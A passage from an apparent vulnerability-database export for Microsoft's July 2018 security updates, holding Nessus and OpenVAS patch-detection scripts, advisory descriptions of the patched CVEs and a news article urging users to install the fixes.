arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8286,\n CVE-2018-8290, CVE-2018-8294)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8289, CVE-2018-8297, CVE-2018-8324,\n CVE-2018-8325)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A security feature bypass vulnerability exists in the\n Microsoft Chakra scripting engine that allows Control\n Flow Guard (CFG) to be bypassed. By itself, the CFG\n bypass vulnerability does not allow arbitrary code\n execution. However, an attacker could use the CFG bypass\n vulnerability in conjunction with another vulnerability,\n such as a remote code execution vulnerability, to run\n arbitrary code on a target system. (CVE-2018-8276)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8262, CVE-2018-8274, CVE-2018-8275,\n CVE-2018-8279, CVE-2018-8301)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8278)\");\n # https://support.microsoft.com/en-us/help/4338819/windows-10-update-kb4338819\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9bfc0c9\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4338819.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338819');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338819])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-07-10T18:56:11", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-3YDRnV5Yt50/W0T-y1h1-yI/AAAAAAAAxcw/7o-KXZj-BYgLV5sFBngpidTGPm-wIRMwgCLcBGAs/s728-e100/microsoft-patch-update.png>)\n\nIt's time to gear up your systems and software for the latest July 2018 Microsoft security patch updates. \n \nMicrosoft today [released](<https://technet.microsoft.com/en-us/security/bulletins>) security patch updates for 53 vulnerabilities, affecting Windows, Internet Explorer (IE), Edge, ChakraCore, .NET Framework, ASP.NET, PowerShell, Visual Studio, and Microsoft Office and Office Services, and Adobe Flash Player. \n \nOut of 53 vulnerabilities, 17 are rated critical, 34 important, one moderate and one as low in severity. \n\n\n \nThis month there is no critical vulnerability patched in Microsoft Windows operating system and surprisingly, none of the flaw patched by the tech giant this month is listed as publicly known or under active attack. \n \n\n\n### Critical Flaws Patched In Microsoft Products\n\n \nMost of the critical issues are memory corruption flaws in IE, Edge browser and Chakra scripting engine, which if successfully exploited, could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system in the context of the current user. \n \n\"If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\" Microsoft explains. \n \nOne of these critical flaws (CVE-2018-8327), reported by researchers at Casaba Security, also affects PowerShell Editor Services that could allow a remote attacker to execute malicious code on a vulnerable system. \n \nHere's below you can find a brief list of all critical vulnerabilities Microsoft has patched this month in its various products: \n\n\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8242)\n * Edge Memory Corruption Vulnerability (CVE-2018-8262)\n * Edge Memory Corruption Vulnerability (CVE-2018-8274)\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8275)\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8279)\n * Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8280)\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8283)\n * Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8286)\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8288)\n * Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8290)\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8291)\n * Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8294)\n * Scripting Engine Memory Corruption Vulnerability (CVE-2018-8296)\n * Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8298)\n * Microsoft Edge Memory Corruption Vulnerability (CVE-2018-8301)\n * Microsoft Edge Information Disclosure Vulnerability (CVE-2018-8324)\n * PowerShell Editor Services Remote Code Execution Vulnerability (CVE-2018-8327)\n \n\n\n### Important Patch Updates for Microsoft Products\n\n \nBesides this, Microsoft has also addressed 34 important flaws categorized as below: \n \n\n\n * Microsoft Edge\u2014Remote code execution (RCE), Information disclosure, spoofing, and security feature bypass flaws\n * Microsoft Internet Explorer (IE)\u2014 RCE and security feature bypass flaws\n * MS Office (Powerpoint, Word, Excel, Access, Lync, Skype)\u2014security feature bypass, RCE, and elevation of privilege flaws\n * Windows 10, 8.1, 7 and Server 2008, 2012, 2016\u2014Denial of Service, security feature bypass, elevation of privilege flaws\n * Microsoft .NET Framework\u2014Elevation of privilege and RCE flaws\n * Microsoft SharePoint\u2014Elevation of Privilege, and RCE flaws\n * ChakraCore\u2014RCE, and security feature bypass vulnerabilities\n * Microsoft Visual Studio\u2014RCE flaw\n * Expression Blend 4\u2014RCE flaw\n * ASP .NET\u2014security feature bypass flaws\n * Mail, Calendar, and People in Windows 8.1 App Store\u2014information disclosure flaw\n \nBesides this, Microsoft has also pushed security updates to patch vulnerabilities in Adobe products, details of which you can get through a [separate article posted](<https://thehackernews.com/2018/07/adobe-patch-update-july.html>) today. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually. \n", "modified": "2018-07-10T18:53:22", "published": "2018-07-10T18:47:00", "id": "THN:482268607F3476C1920BBF880270C854", "href": "https://thehackernews.com/2018/07/microsoft-security-patch-update.html", "type": "thn", "title": "Microsoft Releases Patch Updates for 53 Vulnerabilities In Its Software", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-01-08T13:28:57", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338815", "modified": "2019-12-20T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813652", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338815)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338815)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813652\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-0949\", \"CVE-2018-8206\", \"CVE-2018-8242\",\n \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8304\", \"CVE-2018-8307\", \"CVE-2018-8308\", \"CVE-2018-8309\",\n \"CVE-2018-8313\", \"CVE-2018-8314\", \"CVE-2018-3665\", \"CVE-2018-3639\",\n \"CVE-2017-5753\", \"CVE-2017-5715\", \"CVE-2017-5754\");\n script_bugtraq_id(104705);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:49:36 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338815)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338815\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists doe to error,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Windows Kernel API improperly enforces permissions.\n\n - When Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When the scripting engine handles objects in memory in Microsoft browsers.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - When the scripting engine handles objects in memory in Internet Explorer.\n\n - When Microsoft Internet Explorer improperly handles requests involving UNC\n resources.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Due to Speculative execution side-channel vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338815\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19064\")){\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19064\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:12", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338818", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813645", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813645", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338818)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338818)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813645\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-0949\", \"CVE-2018-8206\", \"CVE-2018-8242\",\n \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8304\", \"CVE-2018-8307\", \"CVE-2018-8308\", \"CVE-2018-8309\",\n \"CVE-2018-8314\", \"CVE-2018-3665\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 09:15:58 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338818)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338818\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When the scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - When Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When Windows Domain Name System (DNS) DNSAPI.dll fails to properly handle\n DNS responses.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - Involving side channel speculative execution, known as Lazy FP State Restore.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to bypass security, cause a target system to stop responding, execute arbitrary\n code in the context of the current user and elevate privileges on an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338818\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24168\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24168\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:28:48", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338814", "modified": "2019-12-20T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813648", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813648", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338814)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338814)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813648\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8260\", \"CVE-2018-8275\", \"CVE-2018-8280\", \"CVE-2018-8287\",\n \"CVE-2018-8288\", \"CVE-2018-8290\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8304\", \"CVE-2018-8307\", \"CVE-2018-8308\", \"CVE-2018-8309\",\n \"CVE-2018-8313\", \"CVE-2018-8356\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:03:55 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338814)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338814\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When scripting engine improperly handles objects in memory in Microsoft\n browsers.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When the Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Microsoft Internet Explorer improperly handles requests involving UNC\n resources.\n\n - When the Windows Kernel API improperly enforces permissions.\n\n - A security feature bypass vulnerability exists in Device Guard.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338814\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2362\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2362\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338829", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813649", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338829)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338829)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813649\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8280\", \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8290\",\n \"CVE-2018-8291\", \"CVE-2018-8296\", \"CVE-2018-8304\", \"CVE-2018-8307\",\n \"CVE-2018-8308\", \"CVE-2018-8309\", \"CVE-2018-8313\", \"CVE-2018-8314\",\n \"CVE-2018-8356\", \"CVE-2018-3665\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:15:15 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338829)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338829\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Chakra scripting engine improperly handles objects in memory in\n browsers.\n\n - When Windows Kernel API improperly enforces permissions.\n\n - when Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When the scripting engine improperly handles objects in memory in\n Microsoft browsers.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - A security feature bypass vulnerability exists in Device Guard.\n\n - When Microsoft Internet Explorer improperly handles requests involving\n UNC resources.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 for 32-bit Systems\n\n Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n 